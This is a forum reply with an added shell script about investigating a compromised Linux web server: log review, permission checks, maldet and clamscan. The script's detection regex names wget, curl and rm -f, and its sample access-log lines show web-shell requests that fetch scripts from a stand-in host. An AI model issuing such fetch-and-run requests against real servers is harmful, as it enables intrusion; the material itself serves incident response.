Quote:
Originally Posted by Patric.F
I'm very interested in this as I don't want to find my new server infected again and start all over.
First and foremost:
https://www.linuxquestions.org/quest...erences-45261/
Not that I'm typical, or even good at this, but I usually start with the logs in /var/log/* and I look for what stands out.
"sites user" seems like a good starting point.
I usually check for incorrect file permissions.
Anything not File=644 and Directory=755 is immediately suspect, unless it's expected, such as .cgi stuff,
and then compare those files with suspicious stuff in /var/log/*
I do not allow the customer to dictate what permissions they "need".
If you allow "users" to ftp in and edit /var/www/some/path, then ftp credentials are immediately suspect.
I check the logs for files being dropped in /tmp or /var/tmp
I check the logs for wget, curl, lwp-<something>, exec, rm -f, unzip, tar...
Code:
maldet -d; maldet -u
using maldet 1.5
clamscan will tell you what's in files that it says are infected.
clamscan does not clean anything; it can move or delete infections if told to do so, and it easily identifies infections.
With 30-some sites, I'd
Code:
clamscan -ir /var/www/ > /root/scan.rpt
which will scan recursively and report only infected files.
Examine /root/scan.rpt closely and compare it to the hits found when examining /var/log/*
WordPress or other popular target platforms? e107, Joomla! up-to-date?
Plugins that are not up-to-date are ruthlessly targeted.
What content "system" are these sites using? What is the common denominator?
All of them up-to-date?
Apache should run as httpd/www-data.
That's a basic start. Other more experienced board members and security pros will offer other techniques I may have missed without my daily caffeine.
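Two of the checks the post describes, as an added shell example that is not part of the thread: listing files and directories under a web root that are not 644/755 (ignoring .cgi), and pulling access-log lines that mention the wget/curl/lwp-/exec/rm -f/unzip/tar tooling. The web root and log lines it runs on are constructed sample data, and it assumes GNU or BSD find and grep.

```shell
#!/bin/sh
# Added example, not from the thread: two checks the post describes,
# files/dirs under a web root that are not 644/755 (ignoring *.cgi) and
# access-log lines carrying the download/exec tool names it lists.
# The web root and log lines below are constructed sample data.
set -u

# Print every file not mode 644 (except *.cgi) and every directory not 755.
find_odd_perms() {
    find "$1" \( -type f ! -name '*.cgi' ! -perm 644 \) -o \( -type d ! -perm 755 \)
}
count_odd_perms() { find_odd_perms "$1" | wc -l | tr -d ' '; }

# Indicators from the post: wget, curl, lwp-*, exec, rm -f, unzip, tar.
# "rm -f" matches raw or URL-encoded; "tar" must stand alone so that
# "start" or "target" do not fire.
SUSPECT_RE='wget|curl|lwp-|exec|rm(%20| |[+])+-f|unzip|(^|[^a-z])tar([^a-z]|$)'
grep_suspect_log() { grep -Ei "$SUSPECT_RE" "$1"; }
count_suspect_lines() { grep -Eic "$SUSPECT_RE" "$1"; }

# Constructed web root: only uploads/ (777) and uploads/x.php (777) should be flagged.
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/site/uploads" "$d/site/cgi-bin"
    : > "$d/site/index.php"; : > "$d/site/uploads/x.php"; : > "$d/site/cgi-bin/hello.cgi"
    chmod 755 "$d" "$d/site" "$d/site/cgi-bin" "$d/site/cgi-bin/hello.cgi"
    chmod 644 "$d/site/index.php"
    chmod 777 "$d/site/uploads" "$d/site/uploads/x.php"
    echo "$d"
}

# Constructed access-log lines: the first and third carry wget/curl, the others are clean.
make_sample_log() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /wp-content/plugins/old/up.php?c=wget%20http://example.invalid/x.sh HTTP/1.1" 200 512
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php HTTP/1.1" 200 4096
192.0.2.9 - - [10/Oct/2023:13:57:12 +0000] "POST /uploads/x.php?c=curl%20-s%20http://example.invalid/p HTTP/1.1" 200 33
198.51.100.7 - - [10/Oct/2023:13:58:44 +0000] "GET /about/start.html HTTP/1.1" 200 2048
EOF
    echo "$f"
}

root=$(make_sample_tree); log=$(make_sample_log)
echo "== not 644/755 under $root"; find_odd_perms "$root"
echo "== suspect lines in $log"; grep_suspect_log "$log"
rm -rf "$root" "$log"
```

On a real box, point find_odd_perms at /var/www and grep_suspect_log at the access logs under /var/log, then cross-check the two lists the way the post suggests.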